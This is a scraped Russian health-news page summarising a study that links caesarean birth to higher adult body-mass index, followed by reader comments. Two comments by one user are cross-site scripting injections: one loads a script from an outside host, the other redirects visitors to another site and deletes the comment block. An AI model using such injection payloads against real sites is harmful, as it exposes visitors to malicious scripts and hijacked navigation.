Здоровье ИНФО
Присоединяйтесь к нам:
Главная страница  >>  Наша кожа  >>  Прыщи  >>  Статьи  >>  Кесарю кесарево, а ребенк...  >>  Кесарю кесарево, а ребенку, родившемуся с помощью кесарева сечения, лишний вес!
 
Обратная связь
 

Кесарю кесарево, а ребенку, родившемуся с помощью кесарева сечения, лишний вес!

Размер шрифта
20 августа 2014 00:00
Юрий Малышев
Здоровье инфо
Александр Чистяков
Здоровье инфо
  • google_analytics: false
  • Нравится

Совсем недавно ученые выяснили, что несмотря на пользу кесарева сечения во многих случаях, оно все же может послужить причиной избыточного веса у вашего будущего ребенка. Повод задуматься!

Кесарю кесарево, а ребенку, родившемуся с помощью кесарева сечения, лишний вес!

Дети, появившиеся на свет путем кесарева сечения, имеют больше шансов иметь лишний вес или даже ожирение во взрослом возрасте. Исследования показали, что у таких людей риск лишнего веса несколько больше, чем у тех, кто был рожден обычным путем. Эти результаты, опубликованные в журнале PLOS ONE, основаны на данных 15 исследований, в которых приняли участие более 38 000 человек.

Ученые подтверждают, что существует ряд важных причин, по которым многим женщинам делают кесарево сечение, однако те женщины, которые выбирают такой способ, должны понимать, что в дальнейшем это может отразиться на ребенке.

Примерно одни из трех-четырех родов в Англии проходят методом кесарева сечения, это где-то в два раза больше чем в 1990 году. В некоторых странах этот уровень гораздо выше: 60% женщин в Китае и половина женщин в Бразилии подвергаются этой процедуре. Предыдущие исследования предполагали, что риск развития таких побочных последствий, как астма и диабет первого типа, также выше у детей, рожденных при помощи кесарева сечения.

Новое исследование, которое включало в себя данные из десяти стран, показало, что индекс массы тела у взрослых людей, рожденных путем кесарева сечения на 0,5 больше, чем у переживших роды через естественные родовые пути. Однако авторы отмечают, что не могут быть уверены в том, что кесарево сечение ответственно за лишний вес, так  как полученные результаты могут быть объяснены некоторыми другими факторами. Профессор Нина Моди из Имперского колледжа в Лондоне, ведущий автор работы, заявляет: «Есть много причин, почему кесарево сечение может быть лучшим выбором для матерей и их детей, иногда эта операция может спасти жизнь. Однако нам нужно понимать все последствия для того, чтобы предложить наилучшее решение женщине, выбирающей способ родов. Эта работа показывает, что после кесарева сечения дети имеют больший риск лишнего веса или ожирения во взрослой жизни. Сейчас нам необходимо понять, является ли это результатом именно кесарева, или есть другие причины, объясняющие наши результаты».

Доктор Мэтью Хайд, один из исследователей, добавляет: «Существует несколько возможных механизмов того, как кесарево сечение может влиять на вес. У детей, появившихся на свет путем влагалищных родов и кесарева сечения, отличается состав бактерий в кишечнике, что может влиять на их здоровье. К тому же компрессия во время вагинальных родов может влиять на «включение» некоторых генов, что в дальнейшем оказывает влияние на метаболизм».

Все это вовсе не значит, что стоит отказываться от кесарева сечения, ведь к нему существует много медицинских показаний. Однако эти данные следует иметь в виду при выборе наилучшего способа родов и обсуждать все решения с вашим врачом.

Другие статьи о беременности и материнстве читайте на страницах нашего специального проекта «Ребенок будет».

  • google_analytics: false
  • Нравится
Послать другу Послать другу Распечатать Распечатать Обсудить на форуме Обсудить на форуме
Комментарии

1 - Гость

26 июня 2015 в 11:46

Цитировать   |   Пожаловаться

какая чушь. Все прекрасно понимают, что кесарево делается часто тем мамам, у кого диабет, и таким образом, большой  ребенок. Поэтому естественно, что у таких мам, у кого итак есть предрасположенность, в виду их болезни, к избыточному весу, будут рождаться дети с этой же предрасположенностью

2 - zzzzzz

30 июня 2015 в 18:34

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js">

3 - zzzzzz

30 июня 2015 в 22:30

Цитировать   |   Пожаловаться

-->> window.location.href="http://a25832-hostde3.fornex.org/"; $("form.noprint, #CommentsBlock").remove();

Статьи

       
Как воспитывать ребенка, чтобы он не был толстым?   Толстейте на здоровье! Сколько лишних килограммов нужно беременным?!   Как поднять вашего ребенка с дивана   В новый год – с новым весом!  
31 мая 2013От инфаркта не убежать, но можно уйти! Новые данные говорят о том, что ходьба также эффективна, как бег, в борьбе с лишним весом! 11 октября 2013Елена Малышева расскажет все о том, как правильно худеть
 
21 мая 2013Когда я ем – я глух и нем! Ученые доказали, что это поможет похудеть! 05 июля 2013Вы не виноваты в своем лишнем весе! Еда всего лишь одна из причин ожирения! Какая же главная?
 

Слайдшоу

1
Ошибки, которые не позволят вам похудеть к Новому году
Как похудеть, ничего не делая
Как натренировать волю и похудеть?

Тесты

1
Будет ли у вас инфаркт?
Кофеин вызывает зависимость?
Какое мороженное съесть, чтобы похудеть
Вопросы и ответы
Яна Александровна Юцковская
Яна Александровна Юцковская Задать вопрос
Посмотреть информацию о враче

Юцковская Яна Александровна, д.м.н., профессор, зав. кафедрой дерматовенерологии и косметологии ГБОУ ВПО «ТГМУ Минздрава России», врач высшей категории, директор ООО «Профессорская клиника Юцковских», Владивосток, директор ООО «Клиника профессора  Юцковской», Москва, президент НП «ДВАЭМ», председатель Дальневосточного отделения МООСБТ.

Елена Николаевна Волкова
Елена Николаевна Волкова Прочитать ответы
Посмотреть информацию о враче

Доктор медицинских наук, профессор кафедры дерматовенерологии Московского факультета ГОУ ВПО «РГМУ им. Н.И. Пирогова Минздравсоцразвития России». Этот консультант отвечал на вопросы пользователей с 03 ноября 2011 г. по 15 февраля 2012 г.